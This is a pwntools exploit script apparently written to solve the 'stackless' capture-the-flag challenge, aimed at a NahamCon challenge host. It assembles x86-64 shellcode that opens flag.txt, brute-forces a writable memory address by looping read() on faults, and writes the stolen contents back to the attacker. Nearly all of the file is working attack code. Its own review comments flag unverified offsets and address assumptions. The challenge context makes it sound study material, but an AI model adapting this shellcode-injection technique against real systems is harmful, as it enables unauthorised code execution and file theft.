#!/usr/bin/env python3
from pwn import *
# Load the patched target ELF once and register it as pwntools' context
# binary so asm() and friends pick up its architecture settings.
context.binary = exe = ELF("./stackless_patched")
def conn():
    """Spawn the local patched binary as a pwntools tube.

    Local-testing path; main() currently has its call to conn() commented
    out in favour of the remote service.
    """
    return process([exe.path])
def main():
    """Drive the challenge service: send the payload length, then the payload.

    Interaction as written here: read one line, send ``len(shellcode)`` as a
    decimal string, read one line, wait for a keypress (``pause()``), send the
    raw shellcode, then hand the tube to the operator with ``interactive()``.
    The remote host/port are hard-coded; the local ``conn()`` path is left
    commented out.
    """
    #r = conn()
    r = remote("challenge.nahamcon.com", 30783)
    # Bruteforce for binary rw-
    # Start addr = 0x0000555555558000
    # NOTE(review): the "Start addr" above does not match the first address
    # the loop probes (r15 = 0x555555556000 + 0x4000 = 0x55555555a000) —
    # TODO reconcile the comment with the code.
    # NOTE(review): all addresses are hard-coded, i.e. the code assumes a
    # fixed, predictable load base for the binary — TODO confirm this holds
    # in the challenge environment.
    # The `lea rdi, [rip + 0x44]` must land on the path string appended
    # after the assembled code; 0x44 is not derived from the assembled
    # length here — TODO verify it equals len(asm(...)) minus the lea.
    # `cmp rax, 0xfffffffffffffff2` compares against -14 (EFAULT) so the
    # loop keeps stepping r15 while read() faults on an unmapped address.
    shellcode = asm("""
lea rdi, [rip + 0x44]
mov rax, 2
syscall
mov r15, 0x0000555555556000
mov rdi, rax
mov rdx, 0x100
loop:
add r15, 0x4000
mov rsi, r15
mov rax, 0
syscall
cmp rax, 0xfffffffffffffff2
je loop
mov eax, 1
mov rdi, 1
syscall
""")
    # NUL-terminated path the rip-relative lea above is meant to point at.
    shellcode += b"flag.txt\x00"
    r.recvline()
    # NOTE(review): a str is passed where pwntools on Python 3 expects
    # bytes; depending on the installed pwntools version this is coerced
    # with a warning or raises TypeError. `str(len(shellcode)).encode()`
    # would be explicit.
    r.sendline(str(len(shellcode)))
    r.recvline()
    # pwntools pause(): blocks until the operator presses a key before the
    # payload is sent (leaves time to attach a debugger locally).
    pause()
    r.sendline(shellcode)
    r.interactive()
if __name__ == "__main__":
    # Only run the solve flow when executed as a script, not on import.
    main()